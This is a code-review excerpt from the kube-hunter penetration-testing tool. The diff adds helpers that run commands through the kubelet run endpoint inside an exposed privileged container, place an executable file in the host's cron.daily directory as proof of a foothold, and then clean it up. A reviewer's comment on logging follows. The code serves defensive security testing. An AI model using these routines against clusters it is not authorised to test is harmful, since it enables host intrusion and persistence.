kube_hunter/modules/hunting/kubelet.py

```diff
@@ -434,6 +452,493 @@ def is_kubesystem_pod(pod):
+                    time.sleep(seconds_to_wait_for_os_command)
+
+                first_check = FootholdViaSecureKubeletPort.has_no_error_nor_exception(command_execution_outcome)
+                second_check = self.check_file_exists(run_request_url, file_to_remove)
+
+                if first_check and not second_check:
+                    return True
+
+        logger.warning("kube-hunter: Unable to remove file: " + file_to_remove)
+
+        return False
+
+    def chmod_command(self, run_request_url, permissions, file):
+        return self.post_request(run_request_url, {"cmd": "chmod {} {}".format(permissions, file)})
+
+    def touch_command(self, run_request_url, file_to_create):
+        return self.post_request(run_request_url, {"cmd": "touch {}".format(file_to_create)})
+
+    def attack_exposed_existing_privileged_container(
+        self, run_request_url, directory_created, number_of_rm_attempts, seconds_to_wait_for_os_command, file_name=None
+    ):
+        if file_name is None:
+            file_name = "kube-hunter" + str(uuid.uuid1())
+
+        file_name_with_path = "{}/etc/cron.daily/{}".format(directory_created, file_name)
+
+        file_created = self.touch_command(run_request_url, file_name_with_path)
+
+        if FootholdViaSecureKubeletPort.has_no_error_nor_exception(file_created):
+            permissions_changed = self.chmod_command(run_request_url, "755", file_name_with_path)
+
+            if FootholdViaSecureKubeletPort.has_no_error_nor_exception(permissions_changed):
+                return {"result": True, "file_created": file_name}
+
+            self.rm_command(run_request_url, file_name_with_path, number_of_rm_attempts, seconds_to_wait_for_os_command)
+
+        return {"result": False}
+
+    def check_directory_exists(self, run_request_url, directory):
+        directory_exists = self.ls_command(run_request_url=run_request_url, file_or_directory=directory)
+
+        return FootholdViaSecureKubeletPort.has_no_error_nor_exception(directory_exists)
+
+    def rmdir_command(
+        self, run_request_url, directory_to_remove, number_of_rmdir_attempts, seconds_to_wait_for_os_command,
+    ):
+        if self.check_directory_exists(run_request_url, directory_to_remove):
+            for _ in range(number_of_rmdir_attempts):
+                command_execution_outcome = self.post_request(
+                    run_request_url, {"cmd": "rmdir {}".format(directory_to_remove)}
+                )
+
+                if seconds_to_wait_for_os_command:
+                    time.sleep(seconds_to_wait_for_os_command)
+
+                first_check = FootholdViaSecureKubeletPort.has_no_error_nor_exception(command_execution_outcome)
+                second_check = self.check_directory_exists(run_request_url, directory_to_remove)
+
+                if first_check and not second_check:
+                    return True
+
+        logger.warning("kube-hunter: Unable to remove directory: " + directory_to_remove)
```

Comment:
I was thinking about this before hand, but didn't want to make you change that because I didnt see a practical use for this, right now you generate the run request url before calling this function.
The warning log **should contain the pod and container we ran on**.
The best way of doing that is probably generating the run url inside this function, and getting the info about the container as an argument.

What do you think?

Reply:
Changed.